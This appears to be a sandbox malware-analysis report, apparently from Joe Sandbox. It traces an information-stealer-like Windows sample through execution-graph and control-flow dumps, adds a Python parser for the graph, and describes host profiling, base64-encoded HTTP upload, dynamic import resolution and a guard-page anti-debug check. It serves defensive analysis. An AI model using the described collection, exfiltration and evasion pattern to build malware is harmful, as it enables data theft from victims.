2 API calls 14131->14132 14133 c3387a 14132->14133 14134 c345c0 2 API calls 14133->14134 14135 c33893 14134->14135 14136 c345c0 2 API calls 14135->14136 14137 c338ac 14136->14137 14138 c345c0 2 API calls 14137->14138 
14139 c338c5 14138->14139 14140 c345c0 2 API calls 14139->14140 14141 c338de 14140->14141 14142 c345c0 2 API calls 14141->14142 14143 c338f7 14142->14143 14144 c345c0 2 API calls 14143->14144 14145 c33910 14144->14145 14146 c345c0 2 API calls 14145->14146 14147 c33929 14146->14147 14148 c345c0 2 API calls 14147->14148 14149 c33942 14148->14149 14150 c345c0 2 API calls 14149->14150 14151 c3395b 14150->14151 14152 c345c0 2 API calls 14151->14152 14153 c33974 14152->14153 14154 c345c0 2 API calls 14153->14154 14155 c3398d 14154->14155 14156 c345c0 2 API calls 14155->14156 14157 c339a6 14156->14157 14158 c345c0 2 API calls 14157->14158 14159 c339bf 14158->14159 14160 c345c0 2 API calls 14159->14160 14161 c339d8 14160->14161 14162 c345c0 2 API calls 14161->14162 14163 c339f1 14162->14163 14164 c345c0 2 API calls 14163->14164 14165 c33a0a 14164->14165 14166 c345c0 2 API calls 14165->14166 14167 c33a23 14166->14167 14168 c345c0 2 API calls 14167->14168 14169 c33a3c 14168->14169 14170 c345c0 2 API calls 14169->14170 14171 c33a55 14170->14171 14172 c345c0 2 API calls 14171->14172 14173 c33a6e 14172->14173 14174 c345c0 2 API calls 14173->14174 14175 c33a87 14174->14175 14176 c345c0 2 API calls 14175->14176 14177 c33aa0 14176->14177 14178 c345c0 2 API calls 14177->14178 14179 c33ab9 14178->14179 14180 c345c0 2 API calls 14179->14180 14181 c33ad2 14180->14181 14182 c345c0 2 API calls 14181->14182 14183 c33aeb 14182->14183 14184 c345c0 2 API calls 14183->14184 14185 c33b04 14184->14185 14186 c345c0 2 API calls 14185->14186 14187 c33b1d 14186->14187 14188 c345c0 2 API calls 14187->14188 14189 c33b36 14188->14189 14190 c345c0 2 API calls 14189->14190 14191 c33b4f 14190->14191 14192 c345c0 2 API calls 14191->14192 14193 c33b68 14192->14193 14194 c345c0 2 API calls 14193->14194 14195 c33b81 14194->14195 14196 c345c0 2 API calls 14195->14196 14197 c33b9a 14196->14197 14198 c345c0 2 API calls 14197->14198 14199 c33bb3 14198->14199 14200 c345c0 2 API calls 14199->14200 14201 c33bcc 
14200->14201 14202 c345c0 2 API calls 14201->14202 14203 c33be5 14202->14203 14204 c345c0 2 API calls 14203->14204 14205 c33bfe 14204->14205 14206 c345c0 2 API calls 14205->14206 14207 c33c17 14206->14207 14208 c345c0 2 API calls 14207->14208 14209 c33c30 14208->14209 14210 c345c0 2 API calls 14209->14210 14211 c33c49 14210->14211 14212 c345c0 2 API calls 14211->14212 14213 c33c62 14212->14213 14214 c345c0 2 API calls 14213->14214 14215 c33c7b 14214->14215 14216 c345c0 2 API calls 14215->14216 14217 c33c94 14216->14217 14218 c345c0 2 API calls 14217->14218 14219 c33cad 14218->14219 14220 c345c0 2 API calls 14219->14220 14221 c33cc6 14220->14221 14222 c345c0 2 API calls 14221->14222 14223 c33cdf 14222->14223 14224 c345c0 2 API calls 14223->14224 14225 c33cf8 14224->14225 14226 c345c0 2 API calls 14225->14226 14227 c33d11 14226->14227 14228 c345c0 2 API calls 14227->14228 14229 c33d2a 14228->14229 14230 c345c0 2 API calls 14229->14230 14231 c33d43 14230->14231 14232 c345c0 2 API calls 14231->14232 14233 c33d5c 14232->14233 14234 c345c0 2 API calls 14233->14234 14235 c33d75 14234->14235 14236 c345c0 2 API calls 14235->14236 14237 c33d8e 14236->14237 14238 c345c0 2 API calls 14237->14238 14239 c33da7 14238->14239 14240 c345c0 2 API calls 14239->14240 14241 c33dc0 14240->14241 14242 c345c0 2 API calls 14241->14242 14243 c33dd9 14242->14243 14244 c345c0 2 API calls 14243->14244 14245 c33df2 14244->14245 14246 c345c0 2 API calls 14245->14246 14247 c33e0b 14246->14247 14248 c345c0 2 API calls 14247->14248 14249 c33e24 14248->14249 14250 c345c0 2 API calls 14249->14250 14251 c33e3d 14250->14251 14252 c345c0 2 API calls 14251->14252 14253 c33e56 14252->14253 14254 c345c0 2 API calls 14253->14254 14255 c33e6f 14254->14255 14256 c345c0 2 API calls 14255->14256 14257 c33e88 14256->14257 14258 c345c0 2 API calls 14257->14258 14259 c33ea1 14258->14259 14260 c345c0 2 API calls 14259->14260 14261 c33eba 14260->14261 14262 c345c0 2 API calls 14261->14262 14263 c33ed3 14262->14263 
14264 c345c0 2 API calls 14263->14264 14265 c33eec 14264->14265 14266 c345c0 2 API calls 14265->14266 14267 c33f05 14266->14267 14268 c345c0 2 API calls 14267->14268 14269 c33f1e 14268->14269 14270 c345c0 2 API calls 14269->14270 14271 c33f37 14270->14271 14272 c345c0 2 API calls 14271->14272 14273 c33f50 14272->14273 14274 c345c0 2 API calls 14273->14274 14275 c33f69 14274->14275 14276 c345c0 2 API calls 14275->14276 14277 c33f82 14276->14277 14278 c345c0 2 API calls 14277->14278 14279 c33f9b 14278->14279 14280 c345c0 2 API calls 14279->14280 14281 c33fb4 14280->14281 14282 c345c0 2 API calls 14281->14282 14283 c33fcd 14282->14283 14284 c345c0 2 API calls 14283->14284 14285 c33fe6 14284->14285 14286 c345c0 2 API calls 14285->14286 14287 c33fff 14286->14287 14288 c345c0 2 API calls 14287->14288 14289 c34018 14288->14289 14290 c345c0 2 API calls 14289->14290 14291 c34031 14290->14291 14292 c345c0 2 API calls 14291->14292 14293 c3404a 14292->14293 14294 c345c0 2 API calls 14293->14294 14295 c34063 14294->14295 14296 c345c0 2 API calls 14295->14296 14297 c3407c 14296->14297 14298 c345c0 2 API calls 14297->14298 14299 c34095 14298->14299 14300 c345c0 2 API calls 14299->14300 14301 c340ae 14300->14301 14302 c345c0 2 API calls 14301->14302 14303 c340c7 14302->14303 14304 c345c0 2 API calls 14303->14304 14305 c340e0 14304->14305 14306 c345c0 2 API calls 14305->14306 14307 c340f9 14306->14307 14308 c345c0 2 API calls 14307->14308 14309 c34112 14308->14309 14310 c345c0 2 API calls 14309->14310 14311 c3412b 14310->14311 14312 c345c0 2 API calls 14311->14312 14313 c34144 14312->14313 14314 c345c0 2 API calls 14313->14314 14315 c3415d 14314->14315 14316 c345c0 2 API calls 14315->14316 14317 c34176 14316->14317 14318 c345c0 2 API calls 14317->14318 14319 c3418f 14318->14319 14320 c345c0 2 API calls 14319->14320 14321 c341a8 14320->14321 14322 c345c0 2 API calls 14321->14322 14323 c341c1 14322->14323 14324 c345c0 2 API calls 14323->14324 14325 c341da 14324->14325 14326 c345c0 2 
API calls 14325->14326 14327 c341f3 14326->14327 14328 c345c0 2 API calls 14327->14328 14329 c3420c 14328->14329 14330 c345c0 2 API calls 14329->14330 14331 c34225 14330->14331 14332 c345c0 2 API calls 14331->14332 14333 c3423e 14332->14333 14334 c345c0 2 API calls 14333->14334 14335 c34257 14334->14335 14336 c345c0 2 API calls 14335->14336 14337 c34270 14336->14337 14338 c345c0 2 API calls 14337->14338 14339 c34289 14338->14339 14340 c345c0 2 API calls 14339->14340 14341 c342a2 14340->14341 14342 c345c0 2 API calls 14341->14342 14343 c342bb 14342->14343 14344 c345c0 2 API calls 14343->14344 14345 c342d4 14344->14345 14346 c345c0 2 API calls 14345->14346 14347 c342ed 14346->14347 14348 c345c0 2 API calls 14347->14348 14349 c34306 14348->14349 14350 c345c0 2 API calls 14349->14350 14351 c3431f 14350->14351 14352 c345c0 2 API calls 14351->14352 14353 c34338 14352->14353 14354 c345c0 2 API calls 14353->14354 14355 c34351 14354->14355 14356 c345c0 2 API calls 14355->14356 14357 c3436a 14356->14357 14358 c345c0 2 API calls 14357->14358 14359 c34383 14358->14359 14360 c345c0 2 API calls 14359->14360 14361 c3439c 14360->14361 14362 c345c0 2 API calls 14361->14362 14363 c343b5 14362->14363 14364 c345c0 2 API calls 14363->14364 14365 c343ce 14364->14365 14366 c345c0 2 API calls 14365->14366 14367 c343e7 14366->14367 14368 c345c0 2 API calls 14367->14368 14369 c34400 14368->14369 14370 c345c0 2 API calls 14369->14370 14371 c34419 14370->14371 14372 c345c0 2 API calls 14371->14372 14373 c34432 14372->14373 14374 c345c0 2 API calls 14373->14374 14375 c3444b 14374->14375 14376 c345c0 2 API calls 14375->14376 14377 c34464 14376->14377 14378 c345c0 2 API calls 14377->14378 14379 c3447d 14378->14379 14380 c345c0 2 API calls 14379->14380 14381 c34496 14380->14381 14382 c345c0 2 API calls 14381->14382 14383 c344af 14382->14383 14384 c345c0 2 API calls 14383->14384 14385 c344c8 14384->14385 14386 c345c0 2 API calls 14385->14386 14387 c344e1 14386->14387 14388 c345c0 2 API calls 
14387->14388 14389 c344fa 14388->14389 14390 c345c0 2 API calls 14389->14390 14391 c34513 14390->14391 14392 c345c0 2 API calls 14391->14392 14393 c3452c 14392->14393 14394 c345c0 2 API calls 14393->14394 14395 c34545 14394->14395 14396 c345c0 2 API calls 14395->14396 14397 c3455e 14396->14397 14398 c345c0 2 API calls 14397->14398 14399 c34577 14398->14399 14400 c345c0 2 API calls 14399->14400 14401 c34590 14400->14401 14402 c345c0 2 API calls 14401->14402 14403 c345a9 14402->14403 14404 c49c10 14403->14404 14405 c4a036 8 API calls 14404->14405 14406 c49c20 43 API calls 14404->14406 14407 c4a146 14405->14407 14408 c4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14405->14408 14406->14405 14409 c4a216 14407->14409 14410 c4a153 8 API calls 14407->14410 14408->14407 14411 c4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14409->14411 14412 c4a298 14409->14412 14410->14409 14411->14412 14413 c4a2a5 6 API calls 14412->14413 14414 c4a337 14412->14414 14413->14414 14415 c4a344 9 API calls 14414->14415 14416 c4a41f 14414->14416 14415->14416 14417 c4a4a2 14416->14417 14418 c4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14416->14418 14419 c4a4dc 14417->14419 14420 c4a4ab GetProcAddress GetProcAddress 14417->14420 14418->14417 14421 c4a515 14419->14421 14422 c4a4e5 GetProcAddress GetProcAddress 14419->14422 14420->14419 14423 c4a612 14421->14423 14424 c4a522 10 API calls 14421->14424 14422->14421 14425 c4a67d 14423->14425 14426 c4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14423->14426 14424->14423 14427 c4a686 GetProcAddress 14425->14427 14428 c4a69e 14425->14428 14426->14425 14427->14428 14429 c4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14428->14429 14430 c45ca3 14428->14430 14429->14430 14431 c31590 14430->14431 15550 c31670 14431->15550 14434 c4a7a0 lstrcpy 14435 c315b5 14434->14435 14436 c4a7a0 lstrcpy 14435->14436 14437 c315c7 
14436->14437 14438 c4a7a0 lstrcpy 14437->14438 14439 c315d9 14438->14439 14440 c4a7a0 lstrcpy 14439->14440 14441 c31663 14440->14441 14442 c45510 14441->14442 14443 c45521 14442->14443 14444 c4a820 2 API calls 14443->14444 14445 c4552e 14444->14445 14446 c4a820 2 API calls 14445->14446 14447 c4553b 14446->14447 14448 c4a820 2 API calls 14447->14448 14449 c45548 14448->14449 14450 c4a740 lstrcpy 14449->14450 14451 c45555 14450->14451 14452 c4a740 lstrcpy 14451->14452 14453 c45562 14452->14453 14454 c4a740 lstrcpy 14453->14454 14455 c4556f 14454->14455 14456 c4a740 lstrcpy 14455->14456 14475 c4557c 14456->14475 14457 c451f0 20 API calls 14457->14475 14458 c45643 StrCmpCA 14458->14475 14459 c456a0 StrCmpCA 14460 c457dc 14459->14460 14459->14475 14461 c4a8a0 lstrcpy 14460->14461 14462 c457e8 14461->14462 14463 c4a820 2 API calls 14462->14463 14465 c457f6 14463->14465 14464 c4a820 lstrlen lstrcpy 14464->14475 14467 c4a820 2 API calls 14465->14467 14466 c45856 StrCmpCA 14468 c45991 14466->14468 14466->14475 14470 c45805 14467->14470 14469 c4a8a0 lstrcpy 14468->14469 14471 c4599d 14469->14471 14472 c31670 lstrcpy 14470->14472 14473 c4a820 2 API calls 14471->14473 14496 c45811 14472->14496 14476 c459ab 14473->14476 14474 c4a740 lstrcpy 14474->14475 14475->14457 14475->14458 14475->14459 14475->14464 14475->14466 14475->14474 14477 c45a0b StrCmpCA 14475->14477 14478 c452c0 25 API calls 14475->14478 14482 c4a7a0 lstrcpy 14475->14482 14490 c4578a StrCmpCA 14475->14490 14493 c31590 lstrcpy 14475->14493 14494 c4593f StrCmpCA 14475->14494 14495 c4a8a0 lstrcpy 14475->14495 14479 c4a820 2 API calls 14476->14479 14480 c45a16 Sleep 14477->14480 14481 c45a28 14477->14481 14478->14475 14483 c459ba 14479->14483 14480->14475 14484 c4a8a0 lstrcpy 14481->14484 14482->14475 14485 c31670 lstrcpy 14483->14485 14486 c45a34 14484->14486 14485->14496 14487 c4a820 2 API calls 14486->14487 14488 c45a43 14487->14488 14489 c4a820 2 API calls 14488->14489 14491 c45a52 14489->14491 14490->14475 14492 
c31670 lstrcpy 14491->14492 14492->14496 14493->14475 14494->14475 14495->14475 14496->13549 14498 c47553 GetVolumeInformationA 14497->14498 14499 c4754c 14497->14499 14500 c47591 14498->14500 14499->14498 14501 c475fc GetProcessHeap RtlAllocateHeap 14500->14501 14502 c47628 wsprintfA 14501->14502 14503 c47619 14501->14503 14505 c4a740 lstrcpy 14502->14505 14504 c4a740 lstrcpy 14503->14504 14506 c45da7 14504->14506 14505->14506 14506->13570 14508 c4a7a0 lstrcpy 14507->14508 14509 c34899 14508->14509 15559 c347b0 14509->15559 14511 c348a5 14512 c4a740 lstrcpy 14511->14512 14513 c348d7 14512->14513 14514 c4a740 lstrcpy 14513->14514 14515 c348e4 14514->14515 14516 c4a740 lstrcpy 14515->14516 14517 c348f1 14516->14517 14518 c4a740 lstrcpy 14517->14518 14519 c348fe 14518->14519 14520 c4a740 lstrcpy 14519->14520 14521 c3490b InternetOpenA StrCmpCA 14520->14521 14522 c34944 14521->14522 14523 c34ecb InternetCloseHandle 14522->14523 15565 c48b60 14522->15565 14525 c34ee8 14523->14525 15580 c39ac0 CryptStringToBinaryA 14525->15580 14526 c34963 15573 c4a920 14526->15573 14529 c34976 14531 c4a8a0 lstrcpy 14529->14531 14536 c3497f 14531->14536 14532 c4a820 2 API calls 14533 c34f05 14532->14533 14535 c4a9b0 4 API calls 14533->14535 14534 c34f27 codecvt 14538 c4a7a0 lstrcpy 14534->14538 14537 c34f1b 14535->14537 14540 c4a9b0 4 API calls 14536->14540 14539 c4a8a0 lstrcpy 14537->14539 14551 c34f57 14538->14551 14539->14534 14541 c349a9 14540->14541 14542 c4a8a0 lstrcpy 14541->14542 14543 c349b2 14542->14543 14544 c4a9b0 4 API calls 14543->14544 14545 c349d1 14544->14545 14546 c4a8a0 lstrcpy 14545->14546 14547 c349da 14546->14547 14548 c4a920 3 API calls 14547->14548 14549 c349f8 14548->14549 14550 c4a8a0 lstrcpy 14549->14550 14552 c34a01 14550->14552 14551->13573 14553 c4a9b0 4 API calls 14552->14553 14554 c34a20 14553->14554 14555 c4a8a0 lstrcpy 14554->14555 14556 c34a29 14555->14556 14557 c4a9b0 4 API calls 14556->14557 14558 c34a48 14557->14558 14559 c4a8a0 lstrcpy 14558->14559 
14560 c34a51 14559->14560 14561 c4a9b0 4 API calls 14560->14561 14562 c34a7d 14561->14562 14563 c4a920 3 API calls 14562->14563 14564 c34a84 14563->14564 14565 c4a8a0 lstrcpy 14564->14565 14566 c34a8d 14565->14566 14567 c34aa3 InternetConnectA 14566->14567 14567->14523 14568 c34ad3 HttpOpenRequestA 14567->14568 14570 c34b28 14568->14570 14571 c34ebe InternetCloseHandle 14568->14571 14572 c4a9b0 4 API calls 14570->14572 14571->14523 14573 c34b3c 14572->14573 14574 c4a8a0 lstrcpy 14573->14574 14575 c34b45 14574->14575 14576 c4a920 3 API calls 14575->14576 14577 c34b63 14576->14577 14578 c4a8a0 lstrcpy 14577->14578 14579 c34b6c 14578->14579 14580 c4a9b0 4 API calls 14579->14580 14581 c34b8b 14580->14581 14582 c4a8a0 lstrcpy 14581->14582 14583 c34b94 14582->14583 14584 c4a9b0 4 API calls 14583->14584 14585 c34bb5 14584->14585 14586 c4a8a0 lstrcpy 14585->14586 14587 c34bbe 14586->14587 14588 c4a9b0 4 API calls 14587->14588 14589 c34bde 14588->14589 14590 c4a8a0 lstrcpy 14589->14590 14591 c34be7 14590->14591 14592 c4a9b0 4 API calls 14591->14592 14593 c34c06 14592->14593 14594 c4a8a0 lstrcpy 14593->14594 14595 c34c0f 14594->14595 14596 c4a920 3 API calls 14595->14596 14597 c34c2d 14596->14597 14598 c4a8a0 lstrcpy 14597->14598 14599 c34c36 14598->14599 14600 c4a9b0 4 API calls 14599->14600 14601 c34c55 14600->14601 14602 c4a8a0 lstrcpy 14601->14602 14603 c34c5e 14602->14603 14604 c4a9b0 4 API calls 14603->14604 14605 c34c7d 14604->14605 14606 c4a8a0 lstrcpy 14605->14606 14607 c34c86 14606->14607 14608 c4a920 3 API calls 14607->14608 14609 c34ca4 14608->14609 14610 c4a8a0 lstrcpy 14609->14610 14611 c34cad 14610->14611 14612 c4a9b0 4 API calls 14611->14612 14613 c34ccc 14612->14613 14614 c4a8a0 lstrcpy 14613->14614 14615 c34cd5 14614->14615 14616 c4a9b0 4 API calls 14615->14616 14617 c34cf6 14616->14617 14618 c4a8a0 lstrcpy 14617->14618 14619 c34cff 14618->14619 14620 c4a9b0 4 API calls 14619->14620 14621 c34d1f 14620->14621 14622 c4a8a0 lstrcpy 14621->14622 14623 c34d28 
[Execution graph rendering omitted; the raw node/edge dump of the interactive widget recorded the following API calls, grouped by the address ranges of the nodes:]
c34d47-c34e67: lstrcpy/lstrlen string assembly, then HttpSendRequestA, InternetReadFile (looped until the read returns nothing), InternetCloseHandle.
c359ee-c35fe0 and c351fd-c358d9: InternetOpenA followed by StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, GetProcessHeap/RtlAllocateHeap, HttpSendRequestA, InternetReadFile (looped), InternetCloseHandle; c347b0: InternetCrackUrlA; c35009-c350ec: InternetOpenUrlA, InternetReadFile (looped), InternetCloseHandle x2.
c417c4-c419c2, c40db7-c40f17, c40f67-c41044, c40759-c40a49: repeated StrCmpCA comparisons; the compare at c417c4 branches to ExitProcess at c417cf.
c41a26-c42699: system-profile collection through helpers: RegOpenKeyExA/RegQueryValueExA/RegCloseKey (c47690, c47e00), GetCurrentProcess/IsWow64Process (c477c0), GetLocalTime/wsprintfA (c47980), GetTimeZoneInformation/wsprintfA (c47a30), GetUserDefaultLocaleName and LocalAlloc/CharToOemW (c47b00, c48d20), GetKeyboardLayoutList/GetLocaleInfoA (c47b90), GetSystemPowerStatus (c47d80), GetCurrentProcessId then OpenProcess/GetModuleFileNameExA/CloseHandle (c49470), GetLogicalProcessorInformationEx/GetLastError (c47f60), GetSystemInfo/wsprintfA (c47ed0), GlobalMemoryStatusEx/wsprintfA (c48100), GetProcessHeap/RtlAllocateHeap/wsprintfA (c487c0), RegOpenKeyExA/RegEnumKeyExA/RegQueryValueExA/wsprintfA/RegCloseKey (c48320, called twice), CreateToolhelp32Snapshot/Process32First/Process32Next/CloseHandle (c48680). The assembled buffer is handed to c45190 -> c35100, which base64-encodes it (CryptBinaryToStringA at c48ea0) and sends it over the InternetOpenA/InternetConnectA/HttpOpenRequestA path above.
c39af9-c39b39: LocalAlloc, CryptStringToBinaryA, LocalFree; c48b60-c48bfc: GetSystemTime; c489f0: GetProcessHeap/HeapFree; c48a10: GetProcessHeap/RtlAllocateHeap.
c36530/c369b0/c36d40-c36f41: VirtualAlloc, LoadLibraryA, GetProcAddress, then VirtualFree and FreeLibrary on the way out.
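Reading the execution graph from its text dump. The edge list above is the serialised form of Joe Sandbox's interactive graph: an "A->B" token is an edge between two node ids, "<id> <address> [API ...]" defines a node whose labels are the API names called there, and a label of the form "<n> API calls" marks a helper whose calls the graph did not expand. The parser below is an added example written for this page, not Joe Sandbox code; its token grammar is inferred from the dump itself rather than from any published format specification. It rebuilds nodes and edges, then walks the graph depth-first in edge order to list the API calls along a path. The embedded sample is an excerpt copied from the c34de7-c34e67 nodes above, with the 15579->14644 edge that appears later in the dump included so the request path connects.

```python
"""Recover API call order from the text dump of a Joe Sandbox execution graph.

Added example for this report page, not Joe Sandbox code. Token grammar,
inferred from the dump itself (no published specification is assumed):
  "A->B"                      edge from node id A to node id B
  "<id> <hexaddr> [label...]" node definition; labels are API names
  "<n> API calls"             label: calls a helper with n unexpanded API calls
"""
import re
from collections import Counter

EDGE = re.compile(r"^(\d+)->(\d+)$")
# Node addresses in the dump are lowercase hex (c34de7 ...); requiring a hex
# letter (see _is_addr) keeps a bare node id from being mistaken for an address.
ADDR = re.compile(r"^[0-9a-f]{4,8}$")

# Excerpt copied from the c34de7-c34e67 nodes of the graph above, plus the
# 15579->14644 edge that appears later in the dump so the path connects.
EXCERPT = (
    "14640 c34de7 lstrlen 14639->14640 14641 c34dfa 14640->14641 "
    "14642 c34e03 lstrlen 14641->14642 15579 c4aad0 14642->15579 15579->14644 "
    "14644 c34e13 HttpSendRequestA 14645 c34e32 InternetReadFile 14644->14645 "
    "14646 c34e67 InternetCloseHandle 14645->14646 14651 c34e5e 14645->14651 "
    "14648 c4a800 14646->14648 14648->14571 14649 c4a9b0 4 API calls 14649->14651 "
    "14650 c4a8a0 lstrcpy 14650->14651 14651->14645 14651->14646 14651->14649 "
    "14651->14650"
)


def _is_addr(tok):
    return bool(ADDR.match(tok)) and not tok.isdigit()


def parse_execution_graph(text):
    """Return (nodes, edges); nodes maps id -> {"addr", "apis", "unexpanded"}."""
    tokens = text.split()
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A node definition is an integer id immediately followed by a hex address.
        if tok.isdigit() and i + 1 < len(tokens) and _is_addr(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "unexpanded": 0}
            i += 2
            continue
        if current is not None:
            # "<n> API calls": the node calls a helper whose n calls were not expanded.
            if tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
                nodes[current]["unexpanded"] += int(tok)
                i += 3
                continue
            nodes[current]["apis"].append(tok)  # a named API call in this node
        i += 1
    return nodes, edges


def api_sequence(nodes, edges, start):
    """Named APIs in first-visit order of a depth-first walk from `start`,
    taking successors in the order their edges appear in the dump."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    seen, order, stack = set(), [], [start]
    while stack:
        n = stack.pop()
        if n in seen or n not in nodes:  # ids referenced but never defined are skipped
            continue
        seen.add(n)
        order.extend(nodes[n]["apis"])
        stack.extend(reversed(succ.get(n, [])))  # reversed so the first edge is visited first
    return order


def named_api_counts(nodes):
    """How often each named API appears across the graph's nodes."""
    return Counter(api for n in nodes.values() for api in n["apis"])


def unexpanded_total(nodes):
    """Sum of the "<n> API calls" counts, i.e. calls hidden inside helpers."""
    return sum(n["unexpanded"] for n in nodes.values())


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(EXCERPT)
    print(" -> ".join(api_sequence(g_nodes, g_edges, 14640)))
    print(dict(named_api_counts(g_nodes)), "unexpanded:", unexpanded_total(g_nodes))
```

Run on the excerpt it prints lstrlen -> lstrlen -> HttpSendRequestA -> InternetReadFile -> InternetCloseHandle -> lstrcpy, with the "4 API calls" helper at c4a9b0 reported separately as unexpanded. Fed the whole dump and started at node 14682 (the c359ee InternetOpenA node) it recovers the InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA and InternetReadFile calls of the c359ee-c35fe0 request routine without reading the edge list by hand.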

                                    Control-flow Graph (function 00C49860-00C49BC2; interactive rendering omitted)
                                    Block 00C4987A-00C49A8E resolves 21 imports with GetProcAddress against the module loaded at 75900000; block 00C49A93-00C49AF2 then calls LoadLibraryA five times, and the remaining blocks resolve seven more exports from the loaded modules, each GetProcAddress sitting behind a conditional branch. Only the last name, NtQueryInformationProcess (an ntdll.dll export), is readable; the other export names are passed as pointers (019Cxxxx/019Dxxxx) whose contents the report does not resolve, so the imports below do not appear in the PE import table.
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,019D07C8), ref: 00C498A1
                                    • GetProcAddress.KERNEL32(75900000,019D06D8), ref: 00C498BA
                                    • GetProcAddress.KERNEL32(75900000,019D07F8), ref: 00C498D2
                                    • GetProcAddress.KERNEL32(75900000,019D0660), ref: 00C498EA
                                    • GetProcAddress.KERNEL32(75900000,019D0750), ref: 00C49903
                                    • GetProcAddress.KERNEL32(75900000,019D8800), ref: 00C4991B
                                    • GetProcAddress.KERNEL32(75900000,019C6920), ref: 00C49933
                                    • GetProcAddress.KERNEL32(75900000,019C67E0), ref: 00C4994C
                                    • GetProcAddress.KERNEL32(75900000,019D05A0), ref: 00C49964
                                    • GetProcAddress.KERNEL32(75900000,019D0828), ref: 00C4997C
                                    • GetProcAddress.KERNEL32(75900000,019D0588), ref: 00C49995
                                    • GetProcAddress.KERNEL32(75900000,019D07B0), ref: 00C499AD
                                    • GetProcAddress.KERNEL32(75900000,019C66A0), ref: 00C499C5
                                    • GetProcAddress.KERNEL32(75900000,019D0720), ref: 00C499DE
                                    • GetProcAddress.KERNEL32(75900000,019D0690), ref: 00C499F6
                                    • GetProcAddress.KERNEL32(75900000,019C68A0), ref: 00C49A0E
                                    • GetProcAddress.KERNEL32(75900000,019D0630), ref: 00C49A27
                                    • GetProcAddress.KERNEL32(75900000,019D0570), ref: 00C49A3F
                                    • GetProcAddress.KERNEL32(75900000,019C66C0), ref: 00C49A57
                                    • GetProcAddress.KERNEL32(75900000,019D0678), ref: 00C49A70
                                    • GetProcAddress.KERNEL32(75900000,019C6800), ref: 00C49A88
                                    • LoadLibraryA.KERNEL32(019D0558,?,00C46A00), ref: 00C49A9A
                                    • LoadLibraryA.KERNEL32(019D06A8,?,00C46A00), ref: 00C49AAB
                                    • LoadLibraryA.KERNEL32(019D0768,?,00C46A00), ref: 00C49ABD
                                    • LoadLibraryA.KERNEL32(019D05B8,?,00C46A00), ref: 00C49ACF
                                    • LoadLibraryA.KERNEL32(019D06C0,?,00C46A00), ref: 00C49AE0
                                    • GetProcAddress.KERNEL32(75070000,019D06F0), ref: 00C49B02
                                    • GetProcAddress.KERNEL32(75FD0000,019D0780), ref: 00C49B23
                                    • GetProcAddress.KERNEL32(75FD0000,019D8EF8), ref: 00C49B3B
                                    • GetProcAddress.KERNEL32(75A50000,019D8F88), ref: 00C49B5D
                                    • GetProcAddress.KERNEL32(74E50000,019C6A20), ref: 00C49B7E
                                    • GetProcAddress.KERNEL32(76E80000,019D8930), ref: 00C49B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C49BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00C49BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                    • Instruction ID: 0fec3c8004f8742d7dd9d43a0fb422571a8d4c4f69c04d382e594feaa8c301ce
                                    • Opcode Fuzzy Hash: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                    • Instruction Fuzzy Hash: 7AA15AB55042419FE348EFAAFD8996E37F9F7C820170C453AE61DA3264D63998C9CB13

                                    Control-flow Graph (function 00C345C0-00C347A9; interactive rendering omitted)
                                    RtlAllocateHeap at 00C3460F, a loop over blocks 00C346A0-00C3474A, then VirtualProtect at 00C3479C. The third VirtualProtect argument, 0x100, is PAGE_GUARD; this is the guard-page behaviour flagged in the signature list above, and a debugger or emulator that touches the protected page will trip the guard.
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C3460F
